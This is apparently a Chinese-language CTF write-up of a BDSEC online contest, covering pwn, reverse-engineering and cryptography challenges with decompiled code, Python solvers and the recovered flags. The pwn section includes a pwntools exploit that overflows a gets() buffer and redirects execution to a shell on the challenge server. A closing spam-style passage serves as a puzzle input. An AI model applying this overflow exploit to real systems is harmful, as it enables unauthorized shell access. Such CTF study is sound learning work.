组队参加了个国外的小线上赛,题目比较简单

目录

PWN

pwnrace

Reverse

BDSec License Checker 0x1

shashdot

Flag Box

Simple Math

Poster

BDSec License Checker 0x03

BDSec License Checker 0x02

Cryptography

CryptoCode

VIPx01

VIPx02

Fake

Dominoes

Loop Lover

Basically RSA

MISC

Message of Hufflepuff

Find Me Inside

NetWorking


PWN

pwnrace

pwn只有一道题,是个ret2system:gets读数据到栈内导致溢出,并且没有开canary和PIE,直接溢出把shell函数的地址写到返回地址里即可

// Password gate decompiled from the challenge binary (function name sic).
// Root cause of the pwn: gets() has no length bound, so input longer than the
// 256-byte stack buffer runs into the saved rbp and the return address; the
// writeup notes the binary has neither a stack canary nor PIE. The fix would be
// a bounded read (e.g. fgets(s1, sizeof s1, stdin)); the code is left as found
// because it is the artifact the writeup analyses.
int heath_check()
{
  char s1[256]; // [rsp+0h] [rbp-100h] BYREF
  printf("\x1B[0;32mEnter Password:\n\x1B[0m");
  gets(s1);                                  // unbounded read into s1
  if ( strcmp(s1, "hAcK_Th3_Pl@n3t") )
  {
    printf("\x1B[41mWrong Password!!!!\n\x1B[0m");
    _exit(0);
  }
  printf("\x1B[4;32mEnter Password:\n\x1B[0m");
  return system("top -b -n 1");              // command resolved through the shell
}
// Not reached from heath_check() above; the writeup uses it as the return
// target (see the disassembly below for the exact address chosen).
int shell()
{
  return system("/bin/sh");
}

但有个小问题:直接写shell函数的入口地址不行,需要跳过push rbp/mov rbp, rsp,从lea rax, command("/bin/sh")这条指令(0x4013A8)开始

.text:00000000004013A0                               ; int shell()
.text:00000000004013A0                               public shell
.text:00000000004013A0                               shell proc near
.text:00000000004013A0                               ; __unwind {
.text:00000000004013A0 F3 0F 1E FA                   endbr64
.text:00000000004013A4 55                            push    rbp
.text:00000000004013A5 48 89 E5                      mov     rbp, rsp
                                                     ; The writeup's return address (0x4013A8) lands on the next
                                                     ; instruction, after the prologue, rather than on the function
                                                     ; entry (0x4013A0). Why entering at 0x4013A0 fails is not
                                                     ; established on this page; confirm in a debugger.
.text:00000000004013A8 48 8D 05 86 13 00 00          lea     rax, command                    ; "/bin/sh"
.text:00000000004013AF 48 89 C7                      mov     rdi, rax                        ; command
.text:00000000004013B2 E8 29 FD FF FF                call    _system
.text:00000000004013B2
.text:00000000004013B7 90                            nop
.text:00000000004013B8 5D                            pop     rbp
.text:00000000004013B9 C3                            retn
.text:00000000004013B9                               ; } // starts at 4013A0
.text:00000000004013B9
.text:00000000004013B9                               shell endp

完整WP

from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./pwnrace')
#p = process('./pwnrace')
p = remote('159.223.101.241', 31337)  # challenge server given in the writeup
#gdb.attach(p, 'b*0x401400')
#pause()
sleep(0.2)
# 0x108 = the 256-byte s1 buffer ([rbp-100h]) plus 8 bytes of saved rbp; the
# next 8 bytes are the return address, pointed at the post-prologue instruction
# of shell() (0x4013a8) as explained above.
p.sendlineafter(b'Password', b"hAcK_Th3_Pl@n3t".ljust(0x108, b'\x00')+ p64(0x4013a8))
p.sendline(b'cat flag')
p.interactive()
#BDSEC{pwn_is_the_way_to_haven}

Reverse

BDSec License Checker 0x1

主程序调用ns_2,后者对每个字符调用ns_1之后直接和表比较

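// License check: the key must be exactly 31 characters and every character ch
// must satisfy ns_1(ch) + 5 == kExpected[i] (ns_1 is defined elsewhere in this
// listing). Returns the puts() result of the verdict message, as the original did.
int __fastcall ns_2(const char *a1)
{
  // Expected per-position values for the 31-character key (was v4[0..30]).
  static const int kExpected[31] = {
    71, 91, 43, 101, 81, 326, 806, 99, 104, 20, 16, 40, 20, 64, 104, 406,
    20, 104, 706, 20, 416, 64, 89, 26, 99, 64, 10, 89, 10, 10, 526
  };
  // strlen() evaluated once; the original re-ran it on every loop iteration.
  const size_t len = strlen(a1);
  if ( len != 31 )                                  // original: > 0x1F || <= 0x1E
    return puts("Invalid license key. Please try again.");
  int ok = 1;
  for ( size_t i = 0; i < len; ++i )
  {
    // Same unsigned arithmetic as the decompilation, so mismatches compare identically.
    if ( (unsigned int)ns_1((unsigned int)a1[i]) + 5 != kExpected[i] )
    {
      ok = 0;
      break;
    }
  }
  if ( ok )
    return puts("Congrats ! You found the right license key.");
  return puts("Invalid license key. Please try again.");
}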
// Reverse the decimal digits of a1 (e.g. 123 -> 321, 100 -> 1, 0 -> 0).
// Intended for non-negative input: negative values wrap through the unsigned
// accumulator exactly as in the original.
__int64 __fastcall ns_1(int a1)
{
  unsigned int reversed = 0;
  for ( int rest = a1; rest != 0; rest /= 10 )
    reversed = reversed * 10 + rest % 10;
  return reversed;
}

WP

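# Brute-force each key character of License Checker 0x1: ns_1 is the
# digit-reversal routine from the decompiled binary and the check is
# ns_1(ch) + 5 == c[i].
c = [71, 91, 43, 101, 81, 326, 806, 99, 104, 20, 16, 40, 20, 64, 104, 406, 20, 104, 706, 20, 416, 64, 89, 26, 99, 64, 10, 89, 10, 10, 526]


def ns_1(a1: int) -> int:
    """Reverse the decimal digits of a1 (123 -> 321), mirroring the binary's ns_1.

    Raises ValueError for negative input, where the original loop never ended
    (a1 //= 10 stops at -1, not 0).
    """
    if a1 < 0:
        raise ValueError("a1 must be non-negative")
    v3 = 0
    while a1 != 0:
        v3 = 10 * v3 + (a1 % 10)
        a1 //= 10
    return v3


def solve(targets: list[int]) -> str:
    """Recover the key for a list of table values.

    For each target the first printable ASCII character (0x21..0x7e) with
    ns_1(ch) + 5 == target is taken; '?' marks a position with no candidate
    so the output keeps its alignment instead of silently shrinking.
    """
    out = []
    for target in targets:
        hit = next((chr(j) for j in range(0x21, 0x7f) if ns_1(j) + 5 == target), '?')
        out.append(hit)
    return ''.join(out)


flag = solve(c)
print(flag)
# BDSEC{l1c3n53_ch3ck3r_0x1_2022}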

shashdot

提示是patch me if you can! 其实不用patch,只是加密逻辑不在main里,直接找到即可:s里全填的是65('A'),再逐位加上v3

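// Prints the flag: a 21-byte buffer pre-filled with 'A' (65) gets one delta
// added per position.
// The original kept only 19 deltas in v3 ([rbp-20h], 19 bytes) and let the
// loop (i <= 20) read two bytes past its end into the adjacent v4 ([rbp-0Dh],
// "!<"); it also never NUL-terminated s before puts(). The table below makes
// the two extra deltas explicit and the buffer is terminated.
unsigned __int64 rrqqq()
{
  static const signed char kDelta[21] = {
    1, 3, 18, 4, 2, 58, 40, 30, -1, 12, 30, -1, 30, 17, 4, 30, 45, -17, -17, '!', '<'
  };
  char s[32];
  memset(s, 65, sizeof(kDelta));
  for ( size_t i = 0; i < sizeof(kDelta); ++i )
    s[i] += kDelta[i];
  s[sizeof(kDelta)] = '\0';   // original relied on whatever followed byte 21
  puts(s);
  return 0;                   // original returned the (always zero) canary difference
}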

WP

# rrqqq(): the binary fills a 21-byte buffer with 'A' (65) and adds one delta
# per position; the last two deltas (33 '!', 60 '<') are the adjacent v4 bytes
# the loop runs into.
c = [1, 3, 18, 4, 2, 58, 40, 30, -1, 12, 30, -1, 30, 17, 4, 30, 45, -17, -17, 33, 60]
decoded = bytearray()
for delta in c:
    decoded.append(65 + delta)
print(bytes(decoded))
# BDSEC{i_@M_@_RE_n00b}

Flag Box

这个和上一题基本一样,主逻辑在ox里:先给出一个串,然后按指定顺序输出其中的字符

 qmemcpy(v28, "dyb}_0SBhCgtUarDiEH{u", sizeof(v28));v0 = std::operator<<<std::char_traits<char>>(&std::cout, 66LL);v1 = std::operator<<<std::char_traits<char>>(v0, (unsigned int)v28[15]);v2 = std::operator<<<std::char_traits<char>>(v1, (unsigned int)v28[6]);v3 = std::operator<<<std::char_traits<char>>(v2, (unsigned int)v28[17]);v4 = std::operator<<<std::char_traits<char>>(v3, (unsigned int)v28[9]);v5 = std::operator<<<std::char_traits<char>>(v4, (unsigned int)v28[19]);v6 = std::operator<<<std::char_traits<char>>(v5, (unsigned int)v28[18]);v7 = std::operator<<<std::char_traits<char>>(v6, (unsigned int)v28[20]);v8 = std::operator<<<std::char_traits<char>>(v7, (unsigned int)v28[14]);v9 = std::operator<<<std::char_traits<char>>(v8, (unsigned int)v28[14]);v10 = std::operator<<<std::char_traits<char>>(v9, (unsigned int)v28[13]);v11 = std::operator<<<std::char_traits<char>>(v10, (unsigned int)v28[8]);v12 = std::operator<<<std::char_traits<char>>(v11, (unsigned int)v28[4]);v13 = std::operator<<<std::char_traits<char>>(v12, (unsigned int)v28[12]);v14 = std::operator<<<std::char_traits<char>>(v13, (unsigned int)v28[4]);v15 = std::operator<<<std::char_traits<char>>(v14, (unsigned int)v28[10]);v16 = std::operator<<<std::char_traits<char>>(v15, (unsigned int)v28[5]);v17 = std::operator<<<std::char_traits<char>>(v16, (unsigned int)v28[11]);v18 = std::operator<<<std::char_traits<char>>(v17, (unsigned int)v28[4]);v19 = std::operator<<<std::char_traits<char>>(v18, (unsigned int)v28[16]);v20 = std::operator<<<std::char_traits<char>>(v19, (unsigned int)v28[11]);v21 = std::operator<<<std::char_traits<char>>(v20, (unsigned int)v28[4]);v22 = std::operator<<<std::char_traits<char>>(v21, (unsigned int)v28[2]);v23 = std::operator<<<std::char_traits<char>>(v22, (unsigned int)v28[20]);v24 = std::operator<<<std::char_traits<char>>(v23, (unsigned int)v28[0]);v25 = std::operator<<<std::char_traits<char>>(v24, (unsigned int)v28[0]);v26 = std::operator<<<std::char_traits<char>>(v25, (unsigned 
int)v28[1]);std::operator<<<std::char_traits<char>>(v26, (unsigned int)v28[3]);return 0LL;

WP

# ox(): the binary prints 'B' and then the characters of c in the order given by a.
c = "dyb}_0SBhCgtUarDiEH{u"
a = [15, 6, 17, 9, 19, 18, 20, 14, 14, 13, 8, 4, 12, 4, 10, 5, 11, 4, 16, 11, 4, 2, 20, 0, 0, 1, 3]
flag = 'B' + ''.join(c[idx] for idx in a)
print(flag)
# BDSEC{Hurrah_U_g0t_it_buddy}

Simple Math

真以为题目重复了,做法同上

qmemcpy(v21, "_YDPCSeEBzZ3aA{}", sizeof(v21));std::operator<<<std::char_traits<char>>(&std::cout,"\nThat was easy right?\n\nBy the way,\nHere is your flag:\n\n",a3);v3 = std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v21[8]);v4 = std::operator<<<std::char_traits<char>>(v3, (unsigned int)v21[2]);v5 = std::operator<<<std::char_traits<char>>(v4, (unsigned int)v21[5]);v6 = std::operator<<<std::char_traits<char>>(v5, (unsigned int)v21[7]);v7 = std::operator<<<std::char_traits<char>>(v6, (unsigned int)v21[4]);v8 = std::operator<<<std::char_traits<char>>(v7, (unsigned int)v21[14]);v9 = std::operator<<<std::char_traits<char>>(v8, (unsigned int)v21[11]);v10 = std::operator<<<std::char_traits<char>>(v9, (unsigned int)v21[12]);v11 = std::operator<<<std::char_traits<char>>(v10, (unsigned int)v21[10]);v12 = std::operator<<<std::char_traits<char>>(v11, (unsigned int)v21[1]);v13 = std::operator<<<std::char_traits<char>>(v12, (unsigned int)v21[0]);v14 = std::operator<<<std::char_traits<char>>(v13, (unsigned int)v21[3]);v15 = std::operator<<<std::char_traits<char>>(v14, (unsigned int)v21[6]);v16 = std::operator<<<std::char_traits<char>>(v15, (unsigned int)v21[13]);v17 = std::operator<<<std::char_traits<char>>(v16, (unsigned int)v21[9]);v18 = std::operator<<<std::char_traits<char>>(v17, (unsigned int)v21[1]);v19 = std::operator<<<std::char_traits<char>>(v18, (unsigned int)v21[15]);std::ostream::operator<<(v19, &std::endl<char,std::char_traits<char>>);return 0LL;
# fg(): same idea, the characters of c printed in the order given by a.
c = "_YDPCSeEBzZ3aA{}"
a = [8, 2, 5, 7, 4, 14, 11, 12, 10, 1, 0, 3, 6, 13, 9, 1, 15]
flag = ''.join(map(c.__getitem__, a))
print(flag)
# BDSEC{3aZY_PeAzY}

Poster

这个是输入以后直接逐字符比较(和UTF-16LE字符串的低字节比较):

  printf("Flag? ");fgets(v8, 73, stdin);v3 = strlen(v8);v4 = 0LL;v5 = v3 - 1;do{if ( v5 == v4 ){puts("Congratulations password iss  your flag");return 0;}v6 = v8[v4++];}while ( v6 == LOBYTE(flag[v4 - 1]) );
.rodata:0000000000002960 42 00 44 00 45 00 43 00 7B 00+text "UTF-16LE", 'BDEC{this_Start_your_re_journey}'

BDSec License Checker 0x03

看上去很复杂,但仔细理一下,就是对大小写字母分别作循环移位,中间再把整个串反转一次

// License Checker 0x03, decompiled. The input is transformed in three passes
// (ROT13 on letters, reverse the string, shift A-Z by +2 and a-z by +8 with
// wrap-around) and then compared byte by byte against v14.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+5h] [rbp-13Bh]
  char v5; // [rsp+5h] [rbp-13Bh]
  char v6; // [rsp+5h] [rbp-13Bh]
  int j; // [rsp+8h] [rbp-138h]
  int k; // [rsp+8h] [rbp-138h]
  int m; // [rsp+8h] [rbp-138h]
  int v10; // [rsp+Ch] [rbp-134h]
  int i; // [rsp+10h] [rbp-130h]
  int v12; // [rsp+14h] [rbp-12Ch]
  char v13; // [rsp+1Ch] [rbp-124h]
  int v14[40]; // [rsp+20h] [rbp-120h]
  char s[104]; // [rsp+C0h] [rbp-80h] BYREF
  unsigned __int64 v16; // [rsp+128h] [rbp-18h]

  v16 = __readfsqword(0x28u);
  v10 = 0;
  // Expected bytes after all three passes. -128 and -127 are the signed-char
  // results of 'x' + 8 and 'y' + 8 in the third pass (the > 122 wrap never fires
  // for them because the sum already overflowed).
  v14[0] = 125;
  v14[1] = 120;
  v14[2] = 84;
  v14[3] = 110;
  v14[4] = 83;
  v14[5] = 119;
  v14[6] = 95;
  v14[7] = 84;
  v14[8] = 84;
  v14[9] = 109;
  v14[10] = 87;
  v14[11] = 111;
  v14[12] = 95;
  v14[13] = 109;
  v14[14] = 84;
  v14[15] = -128;
  v14[16] = 82;
  v14[17] = 122;
  v14[18] = 87;
  v14[19] = 120;
  v14[20] = 95;
  v14[21] = 84;
  v14[22] = 110;
  v14[23] = 105;
  v14[24] = 84;
  v14[25] = 120;
  v14[26] = 88;
  v14[27] = -127;
  v14[28] = 95;
  v14[29] = 110;
  v14[30] = 73;
  v14[31] = 100;
  v14[32] = 123;
  v14[33] = 82;
  v14[34] = 84;
  v14[35] = 72;
  v14[36] = 83;
  v14[37] = 81;
  puts("\t----------------------------");
  puts("\t BDSEC License Checker 0x03");
  puts("\t----------------------------\n");
  printf("Please enter your license to continue : ");
  gets(s, argv);                                // unbounded read into s[104]; the second argument is decompiler noise (gets takes one)
  if ( strlen(s) == 38 )
  {
    for ( i = 0; i < strlen(s); ++i )
    {
      if ( s[i] <= 64 || s[i] > 90 )
      {
        if ( s[i] > 96 && s[i] <= 122 )
        {
          if ( s[i] <= 96 || s[i] > 109 )       // lower-case ROT13
            s[i] -= 13;
          else
            s[i] += 13;
        }
      }
      else if ( s[i] <= 63 || s[i] > 77 )
      {                                         // upper-case ROT13
        s[i] -= 13;
      }
      else
      {
        s[i] += 13;
      }
    }
    v12 = strlen(s);
    for ( j = 0; j < v12 / 2; ++j )             // reverse the string in place
    {
      v13 = s[j];
      s[j] = s[v12 - j - 1];
      s[v12 - j - 1] = v13;
    }
    for ( k = 0; s[k]; ++k )
    {
      v4 = s[k];
      if ( v4 <= 96 || v4 > 122 )
      {
        if ( v4 > 64 && v4 <= 90 )
        {                                       // upper case: shift right by 2
          v6 = v4 + 2;
          if ( v6 > 90 )
            v6 -= 26;
          s[k] = v6;
        }
      }
      else
      {
        v5 = v4 + 8;                            // lower case: shift right by 8 (char arithmetic, may overflow)
        if ( v5 > 122 )
          v5 -= 26;
        s[k] = v5;
      }
    }
    for ( m = 0; m < strlen(s); ++m )           // byte-wise compare with the table
    {
      if ( s[m] != v14[m] )
      {
        v10 = 0;
        break;
      }
      v10 = 1;
    }
    if ( v10 == 1 )
      puts("Congratulations for finding the right license key. I wish I had premium service for you :P But you can get point""s by submitting the license key.");
    else
      puts("Invalid license key. Please try again.");
  }
  else
  {
    puts("Invalid license key. Please try again.");
  }
  return 0;
}

但有个小坑:对比串里的-128和-127这两个值直接逆不回来,所以这两个字母是根据单词猜的(它们其实是小写字母+8后char溢出的结果:'x'+8=128→-128,'y'+8=129→-127,再ROT13回去正好是k和l,与猜测一致)

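# Inverse of the 0x03 checker: the binary applies ROT13, reverses the string,
# then shifts upper-case letters by +2 and lower-case by +8 (wrapping in the
# alphabet) before comparing with this table. The binary's -128/-127 are
# written here as 128/129; both spellings are handled below.
c = [125, 120, 84, 110, 83, 119, 95, 84, 84, 109, 87, 111, 95, 109, 84, 128, 82, 122, 87, 120, 95, 84, 110, 105, 84, 120, 88, 129, 95, 110, 73, 100, 123, 82, 84, 72, 83, 81]


def _undo_shift(b: int) -> int:
    """Invert the final shift pass (+2 for A-Z, +8 for a-z, wrapped).

    b is the byte as the binary stored it (0..255). Values >= 128 are
    'x'..'z' + 8 that overflowed the signed char in the binary (e.g.
    ord('x') + 8 == 128 -> -128); the "> 122: -26" wrap never ran for them,
    so only the +8 is undone.
    """
    if b >= 128:
        return b - 8
    if 65 <= b <= 90:
        return 65 + (b - 65 - 2) % 26
    if 97 <= b <= 122:
        return 97 + (b - 97 - 8) % 26
    return b


def _undo_rot13(b: int) -> int:
    """ROT13 is its own inverse; non-letters pass through unchanged."""
    if 65 <= b <= 90:
        return 65 + (b - 65 + 13) % 26
    if 97 <= b <= 122:
        return 97 + (b - 97 + 13) % 26
    return b


def decode(values: list[int]) -> str:
    """Recover the license key from the comparison table.

    Each entry is taken modulo 256 so both the raw signed values from the
    decompiler (-128) and their unsigned spelling (128) are accepted. The
    result is reversed because the binary reversed the key before shifting.
    """
    chars = [chr(_undo_rot13(_undo_shift(v & 0xff))) for v in values]
    return ''.join(chars)[::-1]


flag = decode(c)
print(flag)
# The two characters the writeup originally had to guess ('l' and 'k') fall
# out of the overflow handling in _undo_shift.
# BDSEC{iTs_lIcEnsE_cHeCkEr_tHrEE_bDsEc}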

BDSec License Checker 0x02

这个是先出的,但是分值高排后边了

跟3相似,只是没有反向,可以直接爆破,不需要理解

 v10 = 65;v9 = 63;v11 = 0;v5[0] = 109;v5[1] = 111;v5[2] = 126;v5[3] = 112;v5[4] = 110;v5[5] = 128;v5[6] = 119;v5[7] = 116;v5[8] = 110;v5[9] = 112;v5[10] = 121;v5[11] = 58;v5[12] = 56;v5[13] = 100;v5[14] = 110;v5[15] = 115;v5[16] = 112;v5[17] = 110;v5[18] = 118;v5[19] = 56;v5[20] = 125;v5[21] = 100;v5[22] = 53;v5[23] = 105;v5[24] = 53;v5[25] = 55;v5[26] = 100;v5[27] = 55;v5[28] = 53;v5[29] = 55;v5[30] = 55;v5[31] = 100;v5[32] = 121;v5[33] = 58;v5[34] = 130;puts("\t----------------------------");puts("\t BDSEC License Checker 0x02");puts("\t----------------------------\n");printf("Please enter your license to continue : ");gets(s, argv);if ( strlen(s) == 35 ){for ( i = 0; s[i]; ++i ){if ( s[i] > 96 && s[i] <= 122 )s[i] -= 32;}for ( i = 0; s[i]; ++i ){if ( s[i] > 64 && s[i] <= 90 )s[i] += 32;}for ( i = 0; s[i]; ++i ){v13 = s[i];if ( v13 <= 96 || v13 > 122 ){if ( v13 > 64 && v13 <= 90 ){v7 = v9 % 10;v13 += v9 % 10;if ( v13 > 90 )v13 -= 26;s[i] = v13;}}else{v7 = v10 % 10;v13 += v10 % 10;if ( v13 > 122 )v13 -= 26;s[i] = v13;}}for ( i = 0; s[i]; ++i ){v13 = s[i];if ( v13 <= 96 || v13 > 122 ){if ( v13 > 64 && v13 <= 90 ){v7 = v9 % 4;v13 += v9 % 4;if ( v13 > 90 )v13 -= 26;s[i] = v13;}}else{v7 = v10 % 4;v13 += v10 % 4;if ( v13 > 122 )v13 -= 26;s[i] = v13;}}for ( i = 0; ; ++i ){v3 = i;if ( v3 >= strlen(s) )break;v8 = s[i];if ( v5[i] != v8 + 5 ){v11 = 0;break;}v11 = 1;}if ( v11 == 1 )puts("Congratulations for finding the right license key. I wish I had premium service for you :P But you can get point""s by submitting the license key.");elseputs("Invalid license key. Please try again.");}else{puts("Invalid license key. Please try again.");}return 0;

把原来的逻辑照抄成Python,然后逐位爆破即可

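# Brute-force for the 0x02 checker. The binary folds every letter to lower
# case, then adds v10 % 10 (+5) and v10 % 4 (+1) to lower-case letters
# (v9 % 10 / v9 % 4 would apply to upper-case ones, which no longer exist at
# that point), wrapping at 'z', and finally compares each byte + 5 with c.
c = [109, 111, 126, 112, 110, 128, 119, 116, 110, 112, 121, 58, 56, 100, 110, 115, 112, 110, 118, 56, 125, 100, 53, 105, 53, 55, 100, 55, 53, 55, 55, 100, 121, 58, 130]
v9 = 63
v10 = 65


def _shift(ch: int, upper_delta: int, lower_delta: int) -> int:
    """One shift pass of the binary: letters move by the delta for their case,
    wrapping back into the alphabet; everything else is unchanged."""
    if 64 < ch <= 90:
        ch += upper_delta
        if ch > 90:
            ch -= 26
    elif 96 < ch <= 122:
        ch += lower_delta
        if ch > 122:
            ch -= 26
    return ch


def transform(ch: int, v9: int = 63, v10: int = 65) -> int:
    """Apply the checker's full transformation to one input byte."""
    if 96 < ch <= 122:
        ch -= 32          # a-z -> A-Z
    if 64 < ch <= 90:
        ch += 32          # A-Z -> a-z (every letter ends up lower case)
    ch = _shift(ch, v9 % 10, v10 % 10)
    return _shift(ch, v9 % 4, v10 % 4)


def solve(targets: list[int], v9: int = 63, v10: int = 65) -> str:
    """For every table entry pick the first printable character (0x21..0x7e)
    whose transform + 5 matches; '?' marks an entry with no candidate so the
    positions stay aligned instead of the output silently shrinking."""
    out = []
    for target in targets:
        hit = next((chr(jj) for jj in range(0x21, 0x7f) if transform(jj, v9, v10) + 5 == target), '?')
        out.append(hit)
    return ''.join(out)


flag = solve(c, v9, v10)
print(flag)
# BDSEC{LICEN53_CHECK3R_0X02_2022_N5}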

Cryptography

CryptoCode

给的密文在cipher.txt里,提示:I convert plain text to cipher text by using Cryptocode library . Always Remember BDSEC is a KEY . 看了提示就明白了:用cryptocode库解密,密钥是BDSEC

c00EtfL9GPq2EItQrkFyPKIMfVFZy0O4ssXtr/V2Io7NMbNS*Brue6Cex4JuWkWU0lUEK2w==*f8EsezuHu2WBstRDlWZiLg==*CZ/4FNMavWZu3kznPrAyeg==
import cryptocode

# The hint names the cryptocode library and says "BDSEC" is the key;
# cryptocode.decrypt() takes the ciphertext and the key.
ciphertext = "c00EtfL9GPq2EItQrkFyPKIMfVFZy0O4ssXtr/V2Io7NMbNS*Brue6Cex4JuWkWU0lUEK2w==*f8EsezuHu2WBstRDlWZiLg==*CZ/4FNMavWZu3kznPrAyeg=="
key = "BDSEC"
myDecryptedMessage = cryptocode.decrypt(ciphertext, key)
print(myDecryptedMessage)
# BDSEC{cryp70_and_pyth0n_ar3_aw3s0me}

VIPx01

题目:

My friend gave me his game username and game id . Can decode game id ?
User : rot
Game ID : OQFRP{pelcg0_ne3_nj3f0z3}

这个是ROT13

BDSEC{crypt0_ar3_aw3s0m3}

VIPx02

这个没做出来,分数很低但确实没做出来,也许是非常简单的加密方法,但确实想不出是哪个

My friend gave me his VIP account credential and he said to me decode my password .
User : twin13
password : 3ip2uq3mj5z95oj59s4q654j4q65hv5746oj4o64pz5644pz18f1bm5tx4v35z95oj59s6w0

Fake

一大篇文章

Dear E-Commerce professional ; This letter was specially
selected to be sent to you . This is a one time mailing
there is no need to request removal if you won't want
any more . This mail is being sent in compliance with
Senate bill 1624 , Title 1 , Section 302 ! This is
not a get rich scheme ! Why work for somebody else
when you can become rich as few as 60 WEEKS . Have
you ever noticed how long the line-ups are at bank
machines plus how long the line-ups are at bank machines
! Well, now is your chance to capitalize on this .
We will help you use credit cards on your website plus
increase customer response by 140% ! You can begin
at absolutely no cost to you ! But don't believe us
! Prof Jones who resides in Massachusetts tried us
and says "Now I'm rich, Rich, RICH" . This offer is
100% legal ! We IMPLORE you - act now . Sign up a friend
and you get half off ! God Bless . Dear Internet user
; This letter was specially selected to be sent to
you . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail . This mail is being sent
in compliance with Senate bill 2016 , Title 9 , Section
302 . This is different than anything else you've seen
! Why work for somebody else when you can become rich
within 92 days . Have you ever noticed society seems
to be moving faster and faster plus nobody is getting
any younger . Well, now is your chance to capitalize
on this . WE will help YOU use credit cards on your
website & decrease perceived waiting time by 140% .
You can begin at absolutely no cost to you ! But don't
believe us ! Ms Ames who resides in Alaska tried us
and says "I was skeptical but it worked for me" . We
are a BBB member in good standing . Do not delay -
order today . Sign up a friend and you get half off
. Thank-you for your serious consideration of our offer
! Dear Business person ; This letter was specially
selected to be sent to you . If you no longer wish
to receive our publications simply reply with a Subject:
of "REMOVE" and you will immediately be removed from
our directory . This mail is being sent in compliance
with Senate bill 2416 , Title 1 , Section 304 . Do
NOT confuse us with Internet scam artists . Why work
for somebody else when you can become rich within 30
DAYS . Have you ever noticed nobody is getting any
younger and nearly every commercial on television has
a .com on in it . Well, now is your chance to capitalize
on this . WE will help YOU process your orders within
seconds plus process your orders within seconds ! You
are guaranteed to succeed because we take all the risk
. But don't believe us . Mrs Simpson who resides in
Alabama tried us and says "My only problem now is where
to park all my cars" ! We are licensed to operate in
all states . We BESEECH you - act now ! Sign up a friend
and your friend will be rich too ! God Bless . Dear
Business person , Thank-you for your interest in our
publication ! We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 2416 , Title 1 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING . Why work for somebody else when you can
become rich within 10 WEEKS ! Have you ever noticed
more people than ever are surfing the web and people
love convenience . Well, now is your chance to capitalize
on this ! We will help you process your orders within
seconds and deliver goods right to the customer's doorstep
. You are guaranteed to succeed because we take all
the risk . But don't believe us . Mr Simpson of Georgia
tried us and says "I've been poor and I've been rich
- rich is better" ! We are a BBB member in good standing
! We urge you to contact us today for your own future
financial well-being ! Sign up a friend and you get
half off . Thanks . Dear Sir or Madam ; You made the
right decision when you signed up for our mailing list
! This is a one time mailing there is no need to request
removal if you won't want any more ! This mail is being
sent in compliance with Senate bill 2216 ; Title 2
; Section 307 ! This is a ligitimate business proposal
! Why work for somebody else when you can become rich
as few as 24 months . Have you ever noticed people
will do almost anything to avoid mailing their bills
plus nobody is getting any younger . Well, now is your
chance to capitalize on this . We will help you increase
customer response by 120% & increase customer response
by 150% . You can begin at absolutely no cost to you
! But don't believe us ! Mrs Anderson who resides in
New York tried us and says "I was skeptical but it
worked for me" . We are licensed to operate in all
states ! So make yourself rich now by ordering immediately
. Sign up a friend and you'll get a discount of 90%
. Best regards . Dear Cybercitizen , Especially for
you - this red-hot announcement ! We will comply with
all removal requests ! This mail is being sent in compliance
with Senate bill 1621 ; Title 4 ; Section 302 ! This
is NOT unsolicited bulk mail . Why work for somebody
else when you can become rich within 78 days ! Have
you ever noticed nobody is getting any younger & most
everyone has a cellphone ! Well, now is your chance
to capitalize on this . WE will help YOU SELL MORE
plus turn your business into an E-BUSINESS ! You can
begin at absolutely no cost to you ! But don't believe
us ! Mrs Jones who resides in North Dakota tried us
and says "My only problem now is where to park all
my cars" . We are a BBB member in good standing . We
beseech you - act now ! Sign up a friend and you'll
get a discount of 10% . Thank-you for your serious
consideration of our offer . Dear Friend , Your email
address has been submitted to us indicating your interest
in our publication ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 1623 , Title 7 , Section 303 . THIS IS
NOT A GET RICH SCHEME . Why work for somebody else
when you can become rich inside 58 MONTHS . Have you
ever noticed nobody is getting any younger plus nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU process your orders within seconds
& decrease perceived waiting time by 140% ! You can
begin at absolutely no cost to you ! But don't believe
us . Ms Simpson of New Hampshire tried us and says
"Now I'm rich many more things are possible" . This
offer is 100% legal ! Do not delay - order today .
Sign up a friend and you'll get a discount of 10% .
Thank-you for your serious consideration of our offer
! Dear Colleague ; Your email address has been submitted
to us indicating your interest in our newsletter !
If you no longer wish to receive our publications simply
reply with a Subject: of "REMOVE" and you will immediately
be removed from our mailing list . This mail is being
sent in compliance with Senate bill 1619 , Title 9
; Section 304 ! This is NOT unsolicited bulk mail .
Why work for somebody else when you can become rich
as few as 82 months . Have you ever noticed the baby
boomers are more demanding than their parents plus
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! We will help
you turn your business into an E-BUSINESS & use credit
cards on your website . You can begin at absolutely
no cost to you . But don't believe us ! Prof Ames of
Michigan tried us and says "I was skeptical but it
worked for me" ! We assure you that we operate within
all applicable laws . For the sake of your family order
now . Sign up a friend and your friend will be rich
too . Cheers ! Dear Internet user , Especially for
you - this hot announcement . We will comply with all
removal requests . This mail is being sent in compliance
with Senate bill 1623 ; Title 6 , Section 309 . This
is NOT unsolicited bulk mail . Why work for somebody
else when you can become rich inside 11 weeks ! Have
you ever noticed people will do almost anything to
avoid mailing their bills plus how long the line-ups
are at bank machines ! Well, now is your chance to
capitalize on this . WE will help YOU deliver goods
right to the customer's doorstep and use credit cards
on your website . You are guaranteed to succeed because
we take all the risk . But don't believe us . Mrs Jones
of Illinois tried us and says "I've been poor and I've
been rich - rich is better" . We assure you that we
operate within all applicable laws . We BESEECH you
- act now ! Sign up a friend and your friend will be
rich too ! Warmest regards . Dear Professional ; Your
email address has been submitted to us indicating your
interest in our briefing ! If you no longer wish to
receive our publications simply reply with a Subject:
of "REMOVE" and you will immediately be removed from
our mailing list . This mail is being sent in compliance
with Senate bill 1623 ; Title 6 ; Section 302 ! This
is not multi-level marketing ! Why work for somebody
else when you can become rich in 99 weeks ! Have you
ever noticed people love convenience and nearly every
commercial on television has a .com on in it ! Well,
now is your chance to capitalize on this ! We will
help you sell more plus deliver goods right to the
customer's doorstep . You can begin at absolutely no
cost to you . But don't believe us ! Prof Ames of South
Carolina tried us and says "My only problem now is
where to park all my cars" . We are licensed to operate
in all states . You have no reason not to act now .
